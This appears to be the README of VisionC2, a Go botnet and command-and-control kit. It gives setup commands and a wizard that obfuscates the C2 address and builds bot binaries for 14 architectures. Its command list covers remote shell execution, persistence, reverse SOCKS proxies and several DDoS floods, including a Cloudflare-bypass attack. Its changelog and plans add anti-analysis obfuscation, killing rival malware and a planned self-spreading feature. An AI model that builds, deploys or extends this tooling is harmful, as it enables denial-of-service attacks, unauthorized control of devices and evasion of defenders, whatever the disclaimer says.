- π Changelog
- π Installation & Setup
- π― Quick Usage
- π οΈ Command Reference
- ποΈ Architecture Overview
- π WIP/TODO
- βοΈ Disclaimer
- π€ Community & Support
VisionC2
hides the C2 Url behind 4 layers of encryption(XOR,RC4,MD5,B64). Vision is built to be setup via setup script meaning there are no code changes required.

sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3
# Go 1.23+ required - see https://go.dev/dl/git clone https://github.com/Syn2Much/VisionC2.git
cd VisionC2
python3 setup.pyπ‘ Setup Wizard handles Encryption, Certs, and Code Updates. The entire setup for Vision takes no more then 5 minutes.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Select Setup Mode β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β β
β [1] Full Setup β
β New C2 address, magic code, certs, everything β
β Use for: Fresh install or complete rebuild β
β β
β [2] C2 URL Update Only β
β Change C2 domain/IP, keep magic code & certs β
β Use for: Server migration, domain change β
β β
β [0] Exit β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Select option [1]: 1
[i] Starting Full Setup...
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 1/5: C2 Server Configuration β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Enter C2 server IP/domain [127.0.0.1]: c2.domain.com
β Enter admin server port [420]: 200
[β] C2 configured: c2.domain.com:443
[β] Admin port: 200
[i] Bot connection port is fixed at 443 (TLS)
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 2/5: Security Token Generation β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[i] Auto-generated Magic Code: 9rOKxDR%EV&90*X%
[i] Auto-generated Protocol Version: V3_3
[i] Auto-generated Crypt Seed: 3c841808
? Use auto-generated security tokens? [Y/n]: y
[i] Applying multi-layer obfuscation...
[β] C2 address obfuscation verified β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 3/5: TLS Certificate Generation β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[i] Certificate details (press Enter for defaults):
β Country code (2 letter) [US]: US
β State/Province [California]: California
β City [San Francisco]: San Francisco
β Organization [Security Research]: Sec Team
β Common Name (domain) [c2.domain.com]:
β Valid days [365]: 360
[i] Generating 4096-bit RSA private key...
[i] Generating self-signed certificate...
[β] TLS certificates generated successfully
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 4/5: Updating Source Code β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
[i] Updating cnc/main.go...
[β] CNC configuration updated
[i] Updating bot/main.go...
[β] Bot configuration updated
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Step 5/5: Building Binaries β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
? Build CNC server? [Y/n]: y
[i] Building CNC server...
[β] CNC server built successfully
? Build bot binaries (14 architectures)? [Y/n]: y
[!] This will take several minutes...
[i] Building bot binaries for 14 architectures...
[i] This may take a few minutes...
That's it! The wizard handles everything:
- C2 address configuration & obfuscation
- Random magic codes & protocol versions
- TLS certificate generation
- Source code updates
- Building CNC + 14 bot architectures
# Start server
cd cnc && ./cnc
# Connect admin (in another terminal)
nc YOUR_IP YOUR_ADMIN_PORT
# Type "spamtec" β login prompt appears
# Bot binaries ready in: bot/bins/
optional: protect UPX packed binaries from string analysis https://github.com/Syn2Much/upx-stripperVisionC2 operates on a client-server model with clear separation between administrative interfaces and bot agents:
βββββββββββββββββββ TLS 1.3 βββββββββββββββββββ
β Admin Console βββββββββββββββββΊβ C2 Server β
β (Multi-User) β β (Go Backend) β
βββββββββββββββββββ βββββββββββββββββββ
β TLS 1.3
βΌ
βββββββββββββββββββ βββββββββββββββββββ
β Bot Agents ββββββββββββββββββ€ Bot Registry β
β (14+ Architectures)β β & Management β
βββββββββββββββββββ βββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β π‘ C2 Resolution - How Bots Find Your Server β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β The bot uses a multi-method resolution system: β
β β
β Resolution Order (automatic fallback): β
β 1. DNS TXT Record β Checks for TXT record on domain β
β 2. DoH TXT Lookup β Cloudflare/Google DNS-over-HTTPS β
β 3. A Record β Falls back to standard DNS A record β
β 4. Direct IP β Uses the value as-is if IP:port β
β β
β You can enter: β
β β’ Direct IP β 192.168.1.100 (simplest) β
β β’ Domain name β c2.example.com (uses A record) β
β β’ TXT domain β lookup.example.com (advanced) β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
help- Context-aware help system (shows available commands)db- User database management (Owner only)private- Specialized commands based on clearance level
bots- List all active agents with detailed status!<botid> <command>- Target specific agent!info- Comprehensive system intelligence!persist- Enhanced persistence mechanisms!reinstall- Agent redeployment!lolnogtfo- Secure agent removal
!socks <port>- Establish SOCKS5 reverse proxy!stopsocks- Terminate proxy connections!shell <command>- Secure remote execution!detach <command>- Background process execution!stream <command>- Real-time output streaming
!udpflood <ip> <port> <duration>!tcpflood <ip> <port> <duration>!http <url/ip> <port> <duration>!https <url> <duration>- TLS 1.3 flood with HTTP/2 fingerprinting!tls <url> <duration>- Alias for HTTPS flood!cfbypass <url> <duration>- Cloudflare UAM bypass attack!syn/!ack/!gre/!dns- Protocol-specific attacks
- BOT Send total device ram on registry
- BOT Debug Logged full connection/register/tls/main loop
- CNC Update New Eye Logo
- CNC Show Total Bot Ram tracked
!stopcommand - Instantly halt all running attacks- HTTPS/TLS 1.3 flood attack with HTTP/2 fingerprinting
- Cloudflare UAM bypass attack
- DNS TXT record C2 resolution with DoH fallback
- Multi-layer encryption (RC4 + XOR + byte substitution + MD5)
- Setup wizard with menu system (Full Setup / C2 Update Only)
- Fixed SOCKS5 proxy, target resolution, telnet handling
- Anti-analysis obfuscation (meaningless function names)
- Added Reverse Socks 5 Modules
- Cleaned up CNC UI
- Built Setup.py to automate setup process
- Initial release with TLS 1.3 encrypted communications
- 14 architecture cross-compilation support
- HMAC challenge-response authentication
- Multiple/Rotating Ports
- Locker/Killer to stay on the device and kill competing malware
- Spread/Self-Rep Mechanism
- Enhanced Daemonize
- Single Instance/Port Takeover Networking
Authorized security research only. Obtain written permission before use. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
We welcome contributions from security professionals:
- Code improvements and optimizations
- Additional evasion techniques
- Enhanced security features
- Documentation and examples
Built upon the framework of 1birdo's BotnetGo
π§ Contact: dev@sinners.city